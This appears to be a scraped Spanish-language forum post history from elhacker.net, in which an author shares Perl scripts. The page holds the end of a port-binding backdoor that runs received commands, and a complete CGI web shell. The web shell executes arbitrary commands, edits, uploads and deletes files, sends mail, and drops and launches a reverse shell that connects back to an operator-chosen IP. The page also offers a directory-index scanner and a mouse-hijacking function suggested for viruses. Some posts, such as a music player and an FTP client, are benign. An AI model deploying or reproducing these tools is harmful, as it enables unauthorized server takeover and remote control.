}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}
}

elsif($rta{'portbind'}) {

$backdoor = IO::Socket::INET->new(
Proto     => 'tcp',
LocalPort => $rta{'portbind'},
Listen    => SOMAXC,
Reuse     => 1);


while ($jesus = $backdoor->accept()) {
$jesus->autoflush(1);
print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : ".$$."\n\n";
print $jesus "Welcome  ".$jesus->peerhost."\n\n";
&extras;
$dir = getcwd();
print $jesus $dir.">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n".$yeah."\n\n";
print $jesus $dir.">>";
}
}

sub extras {

if ($^O =~//ig) {
print $jesus "[+] Domain Name : ".Win32::DomainName()."\n";
print $jesus "[+] OS Version : ".Win32::GetOSName()."\n";
print $jesus "[+] Username : ".Win32::LoginName()."\n\n\n";
} else {
$s =  qx("uname -a");
print $jesus "--==System Info==--\n\n".$s;
}
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print $jebus "<b>".$_."</b><br>"; 	
} else {
print $jebus $_."<br>";
}}

}

print $jebus "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>

<b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>


</body></html>
";

$jebus->close;
	
}
		
} continue {
$jebus->close;
}

# ¿ The End ?

#353

Scripting / [Perl] CGI Shell

14 Octubre 2011, 15:27 PM

Hola a todos

Hoy eh terminado de hacer un shell en cgi , estas shells se usan en las paginas que pemiten ejecutar archivos cgi y tienen el directorio cgi-bin

Esta shell tiene las sig opciones

* Listar directorios
* Ver y editar archivos
* Eliminar archivos y directorios
* ReverseShell
* Subir archivos a un directorio especificado
* Ejecutar comandos
* Enviar mails

Código (perl) [Seleccionar]

#!"\xampp\perl\bin\perl.exe"
#
#CGI Shell 0.1
#
#(C) Doddy Hackman 2011
#
#

use CGI;
use Cwd;
use HTML::Entities;
use Net::SMTP;

my %rta;

my $que = new CGI;
my @ques = $que->param;

for(@ques) {
$rta{$_} = $que->param($_);
}


print "Content-type:text/html\n\n";
print "

<style type=text/css>


.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: #00FF00;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00; 
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

<title>CGI Shell (C) Doddy Hackman 2011</title>
<h2><center>CGI Shell</center></h2>

";

if ($rta{'filex'}) {

open FILE ,">>".$rta{'todir'}."/".$rta{'filex'}; 
while($bytes = read($rta{'filex'},$todo, 1024)) {
print FILE $todo;
}
close FILE;

print "<script>alert('File Uploaded');</script>";

}

if ($rta{'codefile'}) {

unlink($rta{'filecode'});

open (FILE,">>".$rta{'filecode'});
print FILE $rta{'codefile'}."\n";
close FILE;

print "<script>alert('File Changed');</script>";

}

if ($rta{'loadfile'}) {
print "<form action='' method=POST>";
print "<br><h2><center>File ".$rta{'loadfile'}."</h2></center><br><br>";

if (-f $rta{'loadfile'}) {

print "<center><textarea name=codefile cols=70 rows=70>";

open (FILE,$rta{'loadfile'});
@words = <FILE>;
close FILE;

for (@words) {
print HTML::Entities::encode($_);
}
print "
</textarea></center>
<input type=hidden name=filecode value=".$rta{'loadfile'}.">
<br><br><center><input type=submit value=Save></center><br><br>
</form>
";

exit(1);
}
}

print "
<br><br>
<b>Console</b>
<br><br>
<fieldset>";


if ($rta{'cmd'}) {
print qx($rta{'cmd'});
}

elsif ($rta{'mail'}) {

my $send = Net::SMTP->new("localhost",Hello => "localhost",Timeout=>10) or die("[-] Error");
$send->mail($rta{'mail'});
$send->to($rta{'to'});   
$send->data(); 
$send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n"); 
$send->dataend(); 
$send->quit();

}


elsif ($rta{'loadir'}) {

if (-d $rta{'loadir'}) {

opendir DIR,$rta{'loadir'};
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>"; 	
} else {
print $_."<br>";
}}}}

elsif (-f $rta{'delfile'}) {
if (unlink($rta{'delfile'})) {
print "<script>alert('File Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif (-d $rta{'deldir'}) {
if (rmdir($rta{'deldir'})) {
print "<script>alert('Directory Deleted');</script>";
} else {
print "<script>alert('Error');</script>";
}
}

elsif ($rta{'ipconnect'}) {

$code = '
#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) { 
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

#The End
';

if ($^O =~/Win32/ig) { 
open (FILE,">>"."back.pl");
chmod("back.pl","777");
} else {
open (FILE,">>"."/tmp/back.pl");
chmod("/tmp/back.pl","777");
}

print FILE $code;
close FILE;

if ($^O == "MSWin32") { 
system("back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
} else {
system("cd /tmp;back.pl ".$rta{'ipconnect'}." ".$rta{'port'});
}
} else {

opendir DIR,getcwd();
my @archivos = readdir DIR;
close DIR;

for(@archivos) {
if (-d $_) {
print "<b>".$_."</b><br>"; 	
} else {
print $_."<br>";
}}

}

print "</fieldset>
<br><br>
<form action='' method=GET>
<b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br>
</form>
<form action='' method=GET>
<B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load>
</form>
<form action='' method=GET>
<b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del>
</form>
<form action='' method=GET>
<b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del>
</form>
<form enctype='multipart/form-data' method=POST>
<br><b>Upload File</b> : <input type=file name=filex><br><br>
<b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br>
<input type=submit value=Upload>
</form>
<br><B>Mailer</b><br><br>
<form action='' method=GET>
<b>Mail</b> : <input type=text name=mail><br>
<b>To</b> : <input type=text name=to><br>
<b>Subject</B> : <input type=text name=subject><br>
<B>Body</B> : <input type=text name=body><br><br>
<input type=submit value=Send>
</form>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>IP</B> : <input type=text name=ipconnect><br>
<b>Port</B> : <input type=text name=port><br>
<br><input type=submit value=Connect></form><br><br>

";


# ¿ The End ?

#354

Scripting / [Perl] DH Player

14 Octubre 2011, 15:26 PM

Bueno , este es un simple reproductor de musica que hice en perl
En esta version podran tener buscar musica y reproducirla todo en una ventana grosa

Código (perl) [Seleccionar]

#!usr/bin/perl
#DH Player 0.1
#(C) Doddy Hackman 2011

use Tk;
use Win32::MediaPlayer;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}


$test = new Win32::MediaPlayer;

$new = MainWindow->new(-background=>"black");
$new->geometry("350x420+20+20");
$new->resizable(0,0);
$new->title("DH Player 0.1 (C) Doddy Hackman 2011");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Directory : ")->place(-x=>"20",-y=>"20");
my $dir = $new->Entry(-background=>"black",-foreground=>"green",-text=>"C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica")->place(-x=>"100",-y=>"25");
$new->Button(-background=>"black",-foreground=>"green",-activebackground=>"green",-text=>"Search",-width=>"10",-command=>\&buscar)->place(-x=>"240",-y=>"25");
$new->Label(-background=>"black",-foreground=>"green",-text=>"Files Found",-font=>"Impact")->place(-y=>"95",-x=>"120");
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"130",-x=>"100");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Play",-width=>"55",-activebackground=>"green",-command=>\&play)->place(-y=>"310");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Pause",-width=>"55",-activebackground=>"green",-command=>\&pause)->place(-y=>"333");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Resume",-width=>"55",-activebackground=>"green",-command=>\&resume)->place(-y=>"356");	
$new->Button(-background=>"black",-foreground=>"green",-text=>"Stop",-width=>"55",-activebackground=>"green",-command=>\&stop)->place(-y=>"379");	


MainLoop;


sub play {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->load($dir."\\".$cancion);
$test->play;	
}

}

sub stop {
$test->close;
}

sub pause {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->pause;
}

}

sub resume {

my $dir = $dir->get;

$d = $lists->curselection();

for my $id (@$d) {
my $cancion = $lists->get($id);
$test->resume;
}

}

sub buscar {

$lists->delete(0.0,"end");

#$dir = "C:\\Users\\Daniel\\Desktop\\WarFactory\\Perl\\musica";

my $dir = $dir->get;

opendir DIR,$dir;
	
my @archivos = readdir DIR;

close DIR;

chomp @archivos;

foreach my $file(@archivos) {
if (-f $dir."\\".$file) {
$lists->insert("end",$file);
}
}

}


# ¿ The End ?

#355

Scripting / [Perl] Finder Paths

14 Octubre 2011, 15:25 PM

Hola hoy les traigo un programa para buscar los posibles directorios que no estan protegidos con index en una pagina

Código (perl) [Seleccionar]

#!usr/bin/perl
#Finder Paths
#(C) Doddy Hackman 2010

use WWW::Mechanize;
use HTTP::Response;
use URI::Split qw(uri_split);

if ($^O =~/Win32/ig) { system("cls"); } else { system("clear"); } 

my $new = WWW::Mechanize->new(autocheck => 0);
$new->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

&head;
unless($ARGV[0]) {
&menu;
} else {
print "[Page] : $ARGV[0]\n\n";
&scan($ARGV[0]);
}
&finish;

sub menu {
print "[Page] : ";
chomp(my $pa = <STDIN>);
&scan($pa);
}

sub finish {
print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}

sub scan {
my @analizar;
toma($_[0]);
print "\n\n[Target confirmed] : $_[0]\n\n";
print "[Status] : Scanning\n";
@links = dame_link();
for my $junt(@links) {
my $com = $junt->url();
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
if ($path=~/\/(.*)$/) { 	
my $path1 = $1;
$_[0] =~s/$path1//ig;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($com);
if ($path =~/(.*)\//) {
$code = toma($_[0].$1);
my $found = $1;
if ($code=~/Index Of (.*)<\/title>/ig) {
$ok = 1;
print "\n[Link] : ".$_[0].$found."\a";
savefile("indexs-found.txt",$_[0].$found);
}}}}
if ($ok ne 1) { 
print "[Status] : Finish\n"; 
}}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}


sub toma {
return $new->get($_[0])->content;
}

sub dame_link {
return $new->find_all_links();
}

sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}


sub head {
print qq(


##########  #########  #########     #####   #   ##### ### ###  ###
 #  # #  ##  #  #   #   #  # #  #     #  #   #   # # #  #   #  #  #
 #    #  ##  #  #    #  #    #  #     #  #  # #    #    #   #  #   
 ###  #  # # #  #    #  ###  ###      ###   # #    #    #####   ## 
 #    #  # # #  #    #  #    # #      #    #####   #    #   #     #
 #    #  #  ##  #   #   #  # #  #     #    #   #   #    #   #  #  #
###  ######  # #####   ########  #   ###  ### ### ###  ### ### ### 




);
}


#The end
#Blog : doddy-hackman.blogspot.com
#Mail : lepuke[at]hotmail[com]

#356

Scripting / [Perl] FTP Manager

14 Octubre 2011, 15:25 PM

Hoy eh terminado este simple cliente FTP el codigo es el siguiente

Código (perl) [Seleccionar]

#!usr/bin/perl
#FTP Manager
#(C) Doddy Hackman 2010

use Net::FTP;

&head;

print "\n\n[FTP Server] : ";
chomp (my $ftp = <stdin>);
print "[User] : ";
chomp (my $user = <stdin>);
print "[Pass] : ";
chomp (my $pass = <stdin>);


if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {

print "\n[+] Enter of the server FTP\n\n";

menu:

print "\n\n>>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/help/) {
print q(

help : show information
cd : change directory <dir>
dir : list a directory 
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory  
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>


);
}

if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}

if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n"; 
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/exit/ig) {
copyright();
exit(1);
}

if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}

goto menu;

} else {
print "\n\n[-] Failed the login\n\n";
}

} else {
print "\n\n[-] Error\n\n";
}

sub head {
print "\n\n -- == FTP Manager == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2010\n\n";
}


# ¿ The End ?

#357

Scripting / [Perl] Funcion cambiar_fondo()

13 Octubre 2011, 17:15 PM

Hola a todos

Acabo de hacer un funcion usando las API de Windows para poder
cambiar el fondo de escritorio con solo poner la ruta de la
imagen

Código (perl) [Seleccionar]



#By Doddy H

use Win32::API;

sub cambiar_fondo {

my $a = new Win32::API("user32","SystemParametersInfo", [L,L,P,L],L);
$a->Call(20,0,$_[0],0);

}

Ejemplo de uso

Código (perl) [Seleccionar]


cambiar_fondo("c:/Perl/img.bmp");

#358

Scripting / [Perl] Funcion download()

13 Octubre 2011, 17:14 PM

HOla aca les traigo una funcion para descargar
archivos

Código (perl) [Seleccionar]


#!usr/bin/perl
#Simple downloader in Perl
#By Doddy H

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}

Sintasis

Código (perl) [Seleccionar]


download(url a bajar,nombre de archivo con el que se guarda);

Ejemplo de uso

Código (perl) [Seleccionar]


if (download("http://127.0.0.1/bones.rar","bones.rar")) {
print "[+] file downloaded\n";
}

#359

Scripting / [Perl] Funcion crazymouse()

13 Octubre 2011, 17:13 PM

Hola a todos

Si yo de nuevo con esta nueva funcion crazymouse()
, con esta funcion podran volver loco al mouse sin poder controlarlo
todo por un tiempo elegido por ustedes , muy util si estan por
hacer un virus

Código (perl) [Seleccionar]



#By Doddy H
use Win32::GuiTest qw(MouseMoveAbsPix SendMessage);

sub crazymouse {
for my $number(1..$_[0]) {
MouseMoveAbsPix($number,$number);
} 
}

Ejemplo de uso

Código (perl) [Seleccionar]


crazymouse("666");

#360

Scripting / [Perl] Funcion conectar()

13 Octubre 2011, 17:12 PM

Hola a todos.

Aca les dejo una funcion para conectarse mediante sockets al servidor que quieran

Código (perl) [Seleccionar]

use IO::Socket;

sub conectar {

my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout  => 5);

print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}

Sintasis

Código [Seleccionar]


conectar(host,puerto,parametro a enviar)

Ejemplo de uso

Código (perl) [Seleccionar]


$re = conectar("127.0.0.1","80","GET /sql.php HTTP/1.0\r\n");
print $re;

Páginas 1 2 3 4 5 6 7 8 9 10

Test Foro de elhacker.net SMF 2.1

Mostrar Mensajes

Temas - BigBear

PHP / Simple contador de visitas

Scripting / [Perl] Terr0r B0t 0.3

Scripting / [Perl] Project STALKER 0.7

Scripting / [Perl] Manager 0.3

Scripting / [Perl] LocateIP 0.3

Scripting / [Perl] IRC Spam 0.3

Scripting / [Perl] Commander 0.3

Programación C/C++ / [C] ScanPort

Programación C/C++ / [C] ResolveIP

Programación C/C++ / [C] Manager

Programación C/C++ / [C] Iframe DDOS

Programación C/C++ / [C] Hex Converter

Scripting / [Perl] DefacerTools 0.5 (regalo de navidad)

Scripting / [Python] K0bra 0.3

Scripting / [Perl] WormDownloader 0.3

Scripting / [Perl] USB Manager 0.2

Scripting / [Perl] SecurityManager 0.3

Scripting / [Perl] ScanPort 0.5

Scripting / [Perl] Project Stalker 0.5

Scripting / [Perl] ParanoicScan 1.0

Scripting / [Perl] Musikeiro 0.1

Scripting / [Perl] K0bra 1.5

Scripting / [Perl] HeavenDoor 0.5

Scripting / [Perl] GenWordlist 0.2

Scripting / [Perl] FinderText 0.1

Scripting / [Perl] FinderShells 0.3

Scripting / [Perl] FinderPaths 0.5

Scripting / [Perl] DestroyerShells 0.3

Scripting / [Perl Tk] SerialFinder 0.2

Scripting / [Perl Tk] GoogleHack 0.3

Scripting / [Python] PasteBin Uploader

Scripting / [Python] Proxy Tester

Scripting / [Python] Simple Crack Hash

Scripting / [Ruby] PassChecker

Scripting / [Ruby] PasteBin Uploader

Scripting / [Ruby] Proxy Tester

Scripting / [Perl] Commander

Scripting / [Perl] CGI Shell

Scripting / [Perl] DH Player

Scripting / [Perl] Finder Paths

Scripting / [Perl] FTP Manager

Scripting / [Perl] Funcion cambiar_fondo()

Scripting / [Perl] Funcion download()

Scripting / [Perl] Funcion crazymouse()

Scripting / [Perl] Funcion conectar()